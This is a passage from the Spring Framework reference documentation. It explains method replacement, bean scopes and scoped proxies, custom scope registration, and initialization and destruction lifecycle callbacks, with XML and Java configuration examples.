may safely skip the rest of this section until the functionality is actually needed.

With XML-based configuration metadata, you can use the `replaced-method` element to
replace an existing method implementation with another, for a deployed bean. 
Consider
the following class, with a method `computeValue`, which we want to override:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyValueCalculator {

		public String computeValue(String input) {
			// some real code...
		}

		// some other methods...

	}
----

A class implementing the `org.springframework.beans.factory.support.MethodReplacer`
interface provides the new method definition.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	/**
	 * meant to be used to override the existing computeValue(String)
	 * implementation in MyValueCalculator
	 */
	public class ReplacementComputeValue implements MethodReplacer {

		public Object reimplement(Object o, Method m, Object[] args) throws Throwable {
			// get the input value, work with it, and return a computed result
			String input = (String) args[0];
			...
			return ...;
		}
	}
----

The bean definition to deploy the original class and specify the method override would
look like this:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="myValueCalculator" class="x.y.z.MyValueCalculator">
		<!-- arbitrary method replacement -->
		<replaced-method name="computeValue" replacer="replacementComputeValue">
			<arg-type>String</arg-type>
		</replaced-method>
	</bean>

	<bean id="replacementComputeValue" class="a.b.c.ReplacementComputeValue"/>
----

You can use one or more contained `<arg-type/>` elements within the `<replaced-method/>`
element to indicate the method signature of the method being overridden. The signature
for the arguments is necessary only if the method is overloaded and multiple variants
exist within the class. For convenience, the type string for an argument may be a
substring of the fully qualified type name. For example, the following all match
`java.lang.String`:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	java.lang.String
	String
	Str
----

Because the number of arguments is often enough to distinguish between each possible
choice, this shortcut can save a lot of typing by allowing you to type only the
shortest string that matches an argument type.




[[beans-factory-scopes]]
== Bean scopes

When you create a bean definition, you create a __recipe__ for creating actual instances
of the class defined by that bean definition. The idea that a bean definition is a
recipe is important, because it means that, as with a class, you can create many object
instances from a single recipe.

You can control not only the various dependencies and configuration values that are to
be plugged into an object that is created from a particular bean definition, but also
the __scope__ of the objects created from a particular bean definition. This approach is
powerful and flexible in that you can __choose__ the scope of the objects you create
through configuration instead of having to bake in the scope of an object at the Java
class level. Beans can be defined to be deployed in one of a number of scopes: out of
the box, the Spring Framework supports six scopes, four of which are available only if
you use a web-aware `ApplicationContext`.

The following scopes are supported out of the box. 
You can also create\n<<beans-factory-scopes-custom,a custom scope.>>\n\n[[beans-factory-scopes-tbl]]\n.Bean scopes\n|===\n| Scope| Description\n\n| <<beans-factory-scopes-singleton,singleton>>\n| (Default) Scopes a single bean definition to a single object instance per Spring IoC\n container.\n\n| <<beans-factory-scopes-prototype,prototype>>\n| Scopes a single bean definition to any number of object instances.\n\n| <<beans-factory-scopes-request,request>>\n| Scopes a single bean definition to the lifecycle of a single HTTP request; that is,\n each HTTP request has its own instance of a bean created off the back of a single bean\n definition. Only valid in the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-session,session>>\n| Scopes a single bean definition to the lifecycle of an HTTP `Session`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-application,application>>\n| Scopes a single bean definition to the lifecycle of a `ServletContext`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<websocket-stomp-websocket-scope,websocket>>\n| Scopes a single bean definition to the lifecycle of a `WebSocket`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n|===\n\n[NOTE]\n====\nAs of Spring 3.0, a __thread scope__ is available, but is not registered by default. For\nmore information, see the documentation for\n{api-spring-framework}\/context\/support\/SimpleThreadScope.html[`SimpleThreadScope`].\nFor instructions on how to register this or any other custom scope, see\n<<beans-factory-scopes-custom-using>>.\n====\n\n\n\n[[beans-factory-scopes-singleton]]\n=== The singleton scope\n\nOnly one __shared__ instance of a singleton bean is managed, and all requests for beans\nwith an id or ids matching that bean definition result in that one specific bean\ninstance being returned by the Spring container.\n\nTo put it another way, when you define a bean definition and it is scoped as a\nsingleton, the Spring IoC container creates __exactly one__ instance of the object\ndefined by that bean definition. This single instance is stored in a cache of such\nsingleton beans, and __all subsequent requests and references__ for that named bean\nreturn the cached object.\n\nimage::images\/singleton.png[width=400]\n\nSpring's concept of a singleton bean differs from the Singleton pattern as defined in\nthe Gang of Four (GoF) patterns book. The GoF Singleton hard-codes the scope of an\nobject such that one __and only one__ instance of a particular class is created __per\nClassLoader__. The scope of the Spring singleton is best described as __per container\nand per bean__. This means that if you define one bean for a particular class in a\nsingle Spring container, then the Spring container creates one __and only one__ instance\nof the class defined by that bean definition. __The singleton scope is the default scope\nin Spring__. 
To define a bean as a singleton in XML, you would write, for example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="accountService" class="com.foo.DefaultAccountService"/>

	<!-- the following is equivalent, though redundant (singleton scope is the default) -->
	<bean id="accountService" class="com.foo.DefaultAccountService" scope="singleton"/>
----



[[beans-factory-scopes-prototype]]
=== The prototype scope

The non-singleton, prototype scope of bean deployment results in the __creation of a new
bean instance__ every time a request for that specific bean is made. That is, a new
instance is created each time the bean is injected into another bean or you request it
through a `getBean()` method call on the container. As a rule, use the prototype scope
for all stateful beans and the singleton scope for stateless beans.

The following diagram illustrates the Spring prototype scope. __A data access object
(DAO) is not typically configured as a prototype, because a typical DAO does not hold
any conversational state; it was just easier for this author to reuse the core of the
singleton diagram.__

image::images/prototype.png[width=400]

The following example defines a bean as a prototype in XML:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="accountService" class="com.foo.DefaultAccountService" scope="prototype"/>
----

In contrast to the other scopes, Spring does not manage the complete lifecycle of a
prototype bean: the container instantiates, configures, and otherwise assembles a
prototype object, and hands it to the client, with no further record of that prototype
instance. Thus, although __initialization__ lifecycle callback methods are called on all
objects regardless of scope, in the case of prototypes, configured __destruction__
lifecycle callbacks are __not__ called. The client code must clean up prototype-scoped
objects and release expensive resources that the prototype bean(s) are holding. To get
the Spring container to release resources held by prototype-scoped beans, try using a
custom <<beans-factory-extension-bpp,bean post-processor>>, which holds a reference to
beans that need to be cleaned up.

In some respects, the Spring container's role in regard to a prototype-scoped bean is a
replacement for the Java `new` operator. All lifecycle management past that point must
be handled by the client. (For details on the lifecycle of a bean in the Spring
container, see <<beans-factory-lifecycle>>.)



[[beans-factory-scopes-sing-prot-interaction]]
=== Singleton beans with prototype-bean dependencies

When you use singleton-scoped beans with dependencies on prototype beans, be aware that
__dependencies are resolved at instantiation time__. Thus if you dependency-inject a
prototype-scoped bean into a singleton-scoped bean, a new prototype bean is instantiated
and then dependency-injected into the singleton bean. The prototype instance is the sole
instance that is ever supplied to the singleton-scoped bean.

However, suppose you want the singleton-scoped bean to acquire a new instance of the
prototype-scoped bean repeatedly at runtime. You cannot dependency-inject a
prototype-scoped bean into your singleton bean, because that injection occurs only
__once__, when the Spring container is instantiating the singleton bean and resolving
and injecting its dependencies. 
If you need a new instance of a prototype bean at
runtime more than once, see <<beans-factory-method-injection>>.



[[beans-factory-scopes-other]]
=== Request, session, application, and WebSocket scopes

The `request`, `session`, `application`, and `websocket` scopes are __only__ available
if you use a web-aware Spring `ApplicationContext` implementation (such as
`XmlWebApplicationContext`). If you use these scopes with regular Spring IoC containers
such as the `ClassPathXmlApplicationContext`, an `IllegalStateException` will be thrown
complaining about an unknown bean scope.


[[beans-factory-scopes-other-web-configuration]]
==== Initial web configuration

To support the scoping of beans at the `request`, `session`, `application`, and
`websocket` levels (web-scoped beans), some minor initial configuration is
required before you define your beans. (This initial setup is __not__ required
for the standard scopes, `singleton` and `prototype`.)

How you accomplish this initial setup depends on your particular Servlet environment.

If you access scoped beans within Spring Web MVC, in effect, within a request that is
processed by the Spring `DispatcherServlet`, then no special setup is necessary:
`DispatcherServlet` already exposes all relevant state.

If you use a Servlet 2.5 web container, with requests processed outside of Spring's
`DispatcherServlet` (for example, when using JSF or Struts), you need to register the
`org.springframework.web.context.request.RequestContextListener` `ServletRequestListener`.
For Servlet 3.0+, this can be done programmatically via the `WebApplicationInitializer`
interface (see the sketch at the end of this section). Alternatively, or for older
containers, add the following declaration to your web application's `web.xml` file:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<web-app>
		...
		<listener>
			<listener-class>
				org.springframework.web.context.request.RequestContextListener
			</listener-class>
		</listener>
		...
	</web-app>
----

Alternatively, if there are issues with your listener setup, consider using Spring's
`RequestContextFilter`. The filter mapping depends on the surrounding web
application configuration, so you have to change it as appropriate.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<web-app>
		...
		<filter>
			<filter-name>requestContextFilter</filter-name>
			<filter-class>org.springframework.web.filter.RequestContextFilter</filter-class>
		</filter>
		<filter-mapping>
			<filter-name>requestContextFilter</filter-name>
			<url-pattern>/*</url-pattern>
		</filter-mapping>
		...
	</web-app>
----

`DispatcherServlet`, `RequestContextListener`, and `RequestContextFilter` all do exactly
the same thing, namely bind the HTTP request object to the `Thread` that is servicing
that request. This makes beans that are request- and session-scoped available further
down the call chain.
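
For Servlet 3.0+ containers, a minimal sketch of the programmatic registration
mentioned above might look as follows (the class name is an illustrative assumption):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import javax.servlet.ServletContext;
	import javax.servlet.ServletException;

	import org.springframework.web.WebApplicationInitializer;
	import org.springframework.web.context.request.RequestContextListener;

	// hypothetical initializer class; detected automatically by the container
	public class RequestContextBootstrap implements WebApplicationInitializer {

		@Override
		public void onStartup(ServletContext servletContext) throws ServletException {
			// expose the current HTTP request to the thread that services it
			servletContext.addListener(new RequestContextListener());
		}
	}
----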

[[beans-factory-scopes-request]]
==== Request scope

Consider the following XML configuration for a bean definition:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="loginAction" class="com.foo.LoginAction" scope="request"/>
----

The Spring container creates a new instance of the `LoginAction` bean by using the
`loginAction` bean definition for each and every HTTP request. That is, the
`loginAction` bean is scoped at the HTTP request level. You can change the internal
state of the instance that is created as much as you want, because other instances
created from the same `loginAction` bean definition will not see these changes in state;
they are particular to an individual request. When the request completes processing, the
bean that is scoped to the request is discarded.

When using annotation-driven components or Java Config, the `@RequestScope` annotation
can be used to assign a component to the `request` scope.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@RequestScope**
	@Component
	public class LoginAction {
		// ...
	}
----


[[beans-factory-scopes-session]]
==== Session scope

Consider the following XML configuration for a bean definition:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="userPreferences" class="com.foo.UserPreferences" scope="session"/>
----

The Spring container creates a new instance of the `UserPreferences` bean by using the
`userPreferences` bean definition for the lifetime of a single HTTP `Session`. In other
words, the `userPreferences` bean is effectively scoped at the HTTP `Session` level. As
with request-scoped beans, you can change the internal state of the instance that is
created as much as you want, knowing that other HTTP `Session` instances that are also
using instances created from the same `userPreferences` bean definition do not see these
changes in state, because they are particular to an individual HTTP `Session`. When the
HTTP `Session` is eventually discarded, the bean that is scoped to that particular HTTP
`Session` is also discarded.

When using annotation-driven components or Java Config, the `@SessionScope` annotation
can be used to assign a component to the `session` scope.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@SessionScope**
	@Component
	public class UserPreferences {
		// ...
	}
----


[[beans-factory-scopes-application]]
==== Application scope

Consider the following XML configuration for a bean definition:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="appPreferences" class="com.foo.AppPreferences" scope="application"/>
----

The Spring container creates a new instance of the `AppPreferences` bean by using the
`appPreferences` bean definition once for the entire web application. That is, the
`appPreferences` bean is scoped at the `ServletContext` level, stored as a regular
`ServletContext` attribute. This is somewhat similar to a Spring singleton bean but
differs in two important ways: it is a singleton per `ServletContext`, not per Spring
`ApplicationContext` (for which there may be several in any given web application),
and it is actually exposed and therefore visible as a `ServletContext` attribute.

When using annotation-driven components or Java Config, the `@ApplicationScope`
annotation can be used to assign a component to the `application` scope.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@ApplicationScope**
	@Component
	public class AppPreferences {
		// ...
	}
----


[[beans-factory-scopes-other-injection]]
==== Scoped beans as dependencies

The Spring IoC container manages not only the instantiation of your objects (beans),
but also the wiring up of collaborators (or dependencies). 
If you want to inject (for
example) an HTTP request scoped bean into another bean of a longer-lived scope, you may
choose to inject an AOP proxy in place of the scoped bean. That is, you need to inject
a proxy object that exposes the same public interface as the scoped object but that can
also retrieve the real target object from the relevant scope (such as an HTTP request)
and delegate method calls onto the real object.

[NOTE]
====
You may also use `<aop:scoped-proxy/>` between beans that are scoped as `singleton`,
with the reference then going through an intermediate proxy that is serializable
and therefore able to re-obtain the target singleton bean on deserialization.

When declaring `<aop:scoped-proxy/>` against a bean of scope `prototype`, every method
call on the shared proxy leads to the creation of a new target instance, to which the
call is then forwarded.

Also, scoped proxies are not the only way to access beans from shorter scopes in a
lifecycle-safe fashion. You may also simply declare your injection point (i.e. the
constructor/setter argument or autowired field) as `ObjectFactory<MyTargetBean>`,
allowing for a `getObject()` call to retrieve the current instance on demand every
time it is needed - without holding on to the instance or storing it separately.

As an extended variant, you may declare `ObjectProvider<MyTargetBean>` which delivers
several additional access variants, including `getIfAvailable` and `getIfUnique`.

The JSR-330 variant of this is called `Provider`, used with a `Provider<MyTargetBean>`
declaration and a corresponding `get()` call for every retrieval attempt.
See <<beans-standard-annotations,here>> for more details on JSR-330 overall.
====
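
As a sketch of the `ObjectProvider` variant mentioned in the note above, a longer-lived
bean can resolve a shorter-scoped target on every call (the `UserService` class and the
`UserPreferences` type with its `getTheme()` method are assumed here for illustration):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import org.springframework.beans.factory.ObjectProvider;

	public class UserService {

		// hypothetical session-scoped target type, injected as a provider
		private final ObjectProvider<UserPreferences> userPreferences;

		public UserService(ObjectProvider<UserPreferences> userPreferences) {
			this.userPreferences = userPreferences;
		}

		public String currentTheme() {
			// resolves the current scoped instance on every call,
			// without holding on to any particular instance
			return this.userPreferences.getObject().getTheme();
		}
	}
----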

The configuration in the following example is only one line, but it is important to
understand the "why" as well as the "how" behind it.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:aop="http://www.springframework.org/schema/aop"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd
			http://www.springframework.org/schema/aop
			http://www.springframework.org/schema/aop/spring-aop.xsd">

		<!-- an HTTP Session-scoped bean exposed as a proxy -->
		<bean id="userPreferences" class="com.foo.UserPreferences" scope="session">
			<!-- instructs the container to proxy the surrounding bean -->
			<aop:scoped-proxy/>
		</bean>

		<!-- a singleton-scoped bean injected with a proxy to the above bean -->
		<bean id="userService" class="com.foo.SimpleUserService">
			<!-- a reference to the proxied userPreferences bean -->
			<property name="userPreferences" ref="userPreferences"/>
		</bean>
	</beans>
----

To create such a proxy, you insert a child `<aop:scoped-proxy/>` element into a scoped
bean definition (see <<beans-factory-scopes-other-injection-proxies>> and
<<xsd-configuration>>). Why do definitions of beans scoped at the `request`, `session`
and custom-scope levels require the `<aop:scoped-proxy/>` element? Let's examine the
following singleton bean definition and contrast it with what you need to define for
the aforementioned scopes (note that the following `userPreferences` bean definition
as it stands is __incomplete__).

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="userPreferences" class="com.foo.UserPreferences" scope="session"/>

	<bean id="userManager" class="com.foo.UserManager">
		<property name="userPreferences" ref="userPreferences"/>
	</bean>
----

In the preceding example, the singleton bean `userManager` is injected with a reference
to the HTTP `Session`-scoped bean `userPreferences`. The salient point here is that the
`userManager` bean is a singleton: it will be instantiated __exactly once__ per
container, and its dependencies (in this case only one, the `userPreferences` bean) are
also injected only once. This means that the `userManager` bean will only operate on the
exact same `userPreferences` object, that is, the one that it was originally injected
with.

This is __not__ the behavior you want when injecting a shorter-lived scoped bean into a
longer-lived scoped bean, for example injecting an HTTP `Session`-scoped collaborating
bean as a dependency into a singleton bean. Rather, you need a single `userManager`
object, and for the lifetime of an HTTP `Session`, you need a `userPreferences` object
that is specific to said HTTP `Session`. Thus the container creates an object that
exposes the exact same public interface as the `UserPreferences` class (ideally an
object that __is a__ `UserPreferences` instance) which can fetch the real
`UserPreferences` object from the scoping mechanism (HTTP request, `Session`, etc.). The
container injects this proxy object into the `userManager` bean, which is unaware that
this `UserPreferences` reference is a proxy. In this example, when a `UserManager`
instance invokes a method on the dependency-injected `UserPreferences` object, it
actually is invoking a method on the proxy. The proxy then fetches the real
`UserPreferences` object from (in this case) the HTTP `Session`, and delegates the
method invocation onto the retrieved real `UserPreferences` object.

Thus you need the following, correct and complete, configuration when injecting
`request-` and `session-scoped` beans into collaborating objects:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="userPreferences" class="com.foo.UserPreferences" scope="session">
		<aop:scoped-proxy/>
	</bean>

	<bean id="userManager" class="com.foo.UserManager">
		<property name="userPreferences" ref="userPreferences"/>
	</bean>
----

[[beans-factory-scopes-other-injection-proxies]]
===== Choosing the type of proxy to create

By default, when the Spring container creates a proxy for a bean that is marked up with
the `<aop:scoped-proxy/>` element, __a CGLIB-based class proxy is created__.

[NOTE]
====
CGLIB proxies only intercept public method calls! Do not call non-public methods
on such a proxy; they will not be delegated to the actual scoped target object.
====

Alternatively, you can configure the Spring container to create standard JDK
interface-based proxies for such scoped beans, by specifying `false` for the value of
the `proxy-target-class` attribute of the `<aop:scoped-proxy/>` element. Using JDK
interface-based proxies means that you do not need additional libraries in your
application classpath to effect such proxying. 
However, it also means that the class of
the scoped bean must implement at least one interface, and __that all__ collaborators
into which the scoped bean is injected must reference the bean through one of its
interfaces.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- DefaultUserPreferences implements the UserPreferences interface -->
	<bean id="userPreferences" class="com.foo.DefaultUserPreferences" scope="session">
		<aop:scoped-proxy proxy-target-class="false"/>
	</bean>

	<bean id="userManager" class="com.foo.UserManager">
		<property name="userPreferences" ref="userPreferences"/>
	</bean>
----

For more detailed information about choosing class-based or interface-based proxying,
see <<aop-proxying>>.



[[beans-factory-scopes-custom]]
=== Custom scopes

The bean scoping mechanism is extensible; you can define your own
scopes, or even redefine existing scopes, although the latter is considered bad practice
and you __cannot__ override the built-in `singleton` and `prototype` scopes.


[[beans-factory-scopes-custom-creating]]
==== Creating a custom scope

To integrate your custom scope(s) into the Spring container, you need to implement the
`org.springframework.beans.factory.config.Scope` interface, which is described in this
section. For an idea of how to implement your own scopes, see the `Scope`
implementations that are supplied with the Spring Framework itself and the
{api-spring-framework}/beans/factory/config/Scope.html[`Scope` javadocs],
which explain the methods you need to implement in more detail.

The `Scope` interface has four methods to get objects from the scope, remove them from
the scope, and allow them to be destroyed.

The following method returns the object from the underlying scope. The session scope
implementation, for example, returns the session-scoped bean (and if it does not exist,
the method returns a new instance of the bean, after having bound it to the session for
future reference).

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Object get(String name, ObjectFactory objectFactory)
----

The following method removes the object from the underlying scope. The session scope
implementation, for example, removes the session-scoped bean from the underlying session.
The object should be returned, but you can return `null` if the object with the specified
name is not found.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Object remove(String name)
----

The following method registers the callbacks the scope should execute when it is
destroyed or when the specified object in the scope is destroyed. Refer to the javadocs
or a Spring scope implementation for more information on destruction callbacks.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	void registerDestructionCallback(String name, Runnable destructionCallback)
----

The following method obtains the conversation identifier for the underlying scope. This
identifier is different for each scope. For a session scoped implementation, this
identifier can be the session identifier.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	String getConversationId()
----
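
For illustration, here is a minimal sketch of a custom `Scope` backed by a plain map
(the `SimpleMapScope` class is hypothetical; note also that the `Scope` interface
declares a fifth method, `resolveContextualObject`, in addition to the four discussed
above):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import java.util.Map;
	import java.util.concurrent.ConcurrentHashMap;

	import org.springframework.beans.factory.ObjectFactory;
	import org.springframework.beans.factory.config.Scope;

	// illustrative only: a real implementation would tie the map
	// to some contextual lifecycle (thread, conversation, and so on)
	public class SimpleMapScope implements Scope {

		private final Map<String, Object> beans = new ConcurrentHashMap<>();

		@Override
		public Object get(String name, ObjectFactory<?> objectFactory) {
			// create and cache the scoped bean on first request
			return this.beans.computeIfAbsent(name, key -> objectFactory.getObject());
		}

		@Override
		public Object remove(String name) {
			return this.beans.remove(name);
		}

		@Override
		public void registerDestructionCallback(String name, Runnable callback) {
			// destruction callbacks are not supported by this simple sketch
		}

		@Override
		public Object resolveContextualObject(String key) {
			return null;
		}

		@Override
		public String getConversationId() {
			return null;
		}
	}
----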

[[beans-factory-scopes-custom-using]]
==== Using a custom scope

After you write and test one or more custom `Scope` implementations, you need to make
the Spring container aware of your new scope(s). The following method is the central
method to register a new `Scope` with the Spring container:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	void registerScope(String scopeName, Scope scope);
----

This method is declared on the `ConfigurableBeanFactory` interface, which is available
on most of the concrete `ApplicationContext` implementations that ship with Spring via
the `BeanFactory` property.

The first argument to the `registerScope(..)` method is the unique name associated with
a scope; examples of such names in the Spring container itself are `singleton` and
`prototype`. The second argument to the `registerScope(..)` method is an actual instance
of the custom `Scope` implementation that you wish to register and use.

Suppose that you write your custom `Scope` implementation, and then register it as shown below.

[NOTE]
====
The example below uses `SimpleThreadScope`, which is included with Spring but not
registered by default. The instructions would be the same for your own custom `Scope`
implementations.
====

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Scope threadScope = new SimpleThreadScope();
	beanFactory.registerScope("thread", threadScope);
----

You then create bean definitions that adhere to the scoping rules of your custom `Scope`:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="..." class="..." scope="thread">
----

With a custom `Scope` implementation, you are not limited to programmatic registration
of the scope. You can also do the `Scope` registration declaratively, using the
`CustomScopeConfigurer` class:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<beans xmlns="http://www.springframework.org/schema/beans"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:aop="http://www.springframework.org/schema/aop"
		xsi:schemaLocation="http://www.springframework.org/schema/beans
			http://www.springframework.org/schema/beans/spring-beans.xsd
			http://www.springframework.org/schema/aop
			http://www.springframework.org/schema/aop/spring-aop.xsd">

		<bean class="org.springframework.beans.factory.config.CustomScopeConfigurer">
			<property name="scopes">
				<map>
					<entry key="thread">
						<bean class="org.springframework.context.support.SimpleThreadScope"/>
					</entry>
				</map>
			</property>
		</bean>

		<bean id="bar" class="x.y.Bar" scope="thread">
			<property name="name" value="Rick"/>
			<aop:scoped-proxy/>
		</bean>

		<bean id="foo" class="x.y.Foo">
			<property name="bar" ref="bar"/>
		</bean>

	</beans>
----

[NOTE]
====
When you place `<aop:scoped-proxy/>` in a `FactoryBean` implementation, it is the factory
bean itself that is scoped, not the object returned from `getObject()`.
====




[[beans-factory-nature]]
== Customizing the nature of a bean



[[beans-factory-lifecycle]]
=== Lifecycle callbacks

To interact with the container's management of the bean lifecycle, you can implement the
Spring `InitializingBean` and `DisposableBean` interfaces. 
The container calls
`afterPropertiesSet()` for the former and `destroy()` for the latter to allow the bean
to perform certain actions upon initialization and destruction.

[TIP]
====
The JSR-250 `@PostConstruct` and `@PreDestroy` annotations are generally considered best
practice for receiving lifecycle callbacks in a modern Spring application. Using these
annotations means that your beans are not coupled to Spring-specific interfaces. For
details see <<beans-postconstruct-and-predestroy-annotations>>.

If you don't want to use the JSR-250 annotations but you still want to remove coupling,
consider using `init-method` and `destroy-method` bean definition metadata.
====

Internally, the Spring Framework uses `BeanPostProcessor` implementations to process any
callback interfaces it can find and call the appropriate methods. If you need custom
features or other lifecycle behavior that Spring does not offer out of the box, you can
implement a `BeanPostProcessor` yourself. For more information, see
<<beans-factory-extension>>.

In addition to the initialization and destruction callbacks, Spring-managed objects may
also implement the `Lifecycle` interface so that those objects can participate in the
startup and shutdown process as driven by the container's own lifecycle.

The lifecycle callback interfaces are described in this section.


[[beans-factory-lifecycle-initializingbean]]
==== Initialization callbacks

The `org.springframework.beans.factory.InitializingBean` interface allows a bean to
perform initialization work after all necessary properties on the bean have been set by
the container. The `InitializingBean` interface specifies a single method:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	void afterPropertiesSet() throws Exception;
----

It is recommended that you do not use the `InitializingBean` interface because it
unnecessarily couples the code to Spring. Alternatively, use
the <<beans-postconstruct-and-predestroy-annotations, `@PostConstruct`>> annotation or
specify a POJO initialization method. In the case of XML-based configuration metadata,
you use the `init-method` attribute to specify the name of the method that has a void
no-argument signature. With Java config, you use the `initMethod` attribute of `@Bean`,
see <<beans-java-lifecycle-callbacks>>. For example, the following:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleInitBean" class="examples.ExampleBean" init-method="init"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class ExampleBean {

		public void init() {
			// do some initialization work
		}

	}
----

...is exactly the same as...

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleInitBean" class="examples.AnotherExampleBean"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class AnotherExampleBean implements InitializingBean {

		public void afterPropertiesSet() {
			// do some initialization work
		}

	}
----

but does not couple the code to Spring.


[[beans-factory-lifecycle-disposablebean]]
==== Destruction callbacks

Implementing the `org.springframework.beans.factory.DisposableBean` interface allows a
bean to get a callback when the container containing it is destroyed. 
The
`DisposableBean` interface specifies a single method:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	void destroy() throws Exception;
----

It is recommended that you do not use the `DisposableBean` callback interface because it
unnecessarily couples the code to Spring. Alternatively, use
the <<beans-postconstruct-and-predestroy-annotations, `@PreDestroy`>> annotation or
specify a generic method that is supported by bean definitions. With XML-based
configuration metadata, you use the `destroy-method` attribute on the `<bean/>`.
With Java config, you use the `destroyMethod` attribute of `@Bean`; see
<<beans-java-lifecycle-callbacks>>. For example, the following definition:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleInitBean" class="examples.ExampleBean" destroy-method="cleanup"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class ExampleBean {

		public void cleanup() {
			// do some destruction work (like releasing pooled connections)
		}

	}
----

is exactly the same as:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleInitBean" class="examples.AnotherExampleBean"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class AnotherExampleBean implements DisposableBean {

		public void destroy() {
			// do some destruction work (like releasing pooled connections)
		}

	}
----

but does not couple the code to Spring.

[TIP]
====
The `destroy-method` attribute of a `<bean>` element can be assigned a special
`(inferred)` value, which instructs Spring to automatically detect a public `close` or
`shutdown` method on the specific bean class (any class that implements
`java.lang.AutoCloseable` or `java.io.Closeable` would therefore match). This special
`(inferred)` value can also be set on the `default-destroy-method` attribute of a
`<beans>` element to apply this behavior to an entire set of beans (see
<<beans-factory-lifecycle-default-init-destroy-methods>>). Note that this is the
default behavior with Java config.
====

[[beans-factory-lifecycle-default-init-destroy-methods]]
==== Default initialization and destroy methods

When you write initialization and destroy method callbacks that do not use the
Spring-specific `InitializingBean` and `DisposableBean` callback interfaces, you
typically write methods with names such as `init()`, `initialize()`, `dispose()`, and so
on. Ideally, the names of such lifecycle callback methods are standardized across a
project so that all developers use the same method names and ensure consistency.

You can configure the Spring container to look for named initialization and destroy
callback method names on __every__ bean. This means that you, as an application
developer, can write your application classes and use an initialization callback called
`init()`, without having to configure an `init-method="init"` attribute with each bean
definition. The Spring IoC container calls that method when the bean is created (and in
accordance with the standard lifecycle callback contract described previously). This
feature also enforces a consistent naming convention for initialization and destroy
method callbacks.

Suppose that your initialization callback methods are named `init()` and destroy
callback methods are named `destroy()`.
Your class will resemble the class in the
following example.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class DefaultBlogService implements BlogService {

		private BlogDao blogDao;

		public void setBlogDao(BlogDao blogDao) {
			this.blogDao = blogDao;
		}

		// this is (unsurprisingly) the initialization callback method
		public void init() {
			if (this.blogDao == null) {
				throw new IllegalStateException("The [blogDao] property must be set.");
			}
		}

	}
----

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans default-init-method="init">

		<bean id="blogService" class="com.foo.DefaultBlogService">
			<property name="blogDao" ref="blogDao" />
		</bean>

	</beans>
----

The presence of the `default-init-method` attribute on the top-level `<beans/>` element
causes the Spring IoC container to recognize a method called `init` on beans
as the initialization method callback. When a bean is created and assembled, if the bean
class has such a method, it is invoked at the appropriate time.

You configure destroy method callbacks similarly (in XML, that is) by using the
`default-destroy-method` attribute on the top-level `<beans/>` element.

Where existing bean classes already have callback methods that are named at variance
with the convention, you can override the default by specifying (in XML, that is) the
method name using the `init-method` and `destroy-method` attributes of the `<bean/>`
itself.

The Spring container guarantees that a configured initialization callback is called
immediately after a bean is supplied with all dependencies. Thus the initialization
callback is called on the raw bean reference, which means that AOP interceptors and so
forth are not yet applied to the bean. A target bean is fully created __first__,
__then__ an AOP proxy (for example) with its interceptor chain is applied. If the target
bean and the proxy are defined separately, your code can even interact with the raw
target bean, bypassing the proxy. Hence, it would be inconsistent to apply the
interceptors to the init method, because doing so would couple the lifecycle of the
target bean with its proxy/interceptors and leave strange semantics when your code
interacts directly with the raw target bean.


[[beans-factory-lifecycle-combined-effects]]
==== Combining lifecycle mechanisms

As of Spring 2.5, you have three options for controlling bean lifecycle behavior: the
<<beans-factory-lifecycle-initializingbean, `InitializingBean`>> and
<<beans-factory-lifecycle-disposablebean, `DisposableBean`>> callback interfaces; custom
`init()` and `destroy()` methods; and the
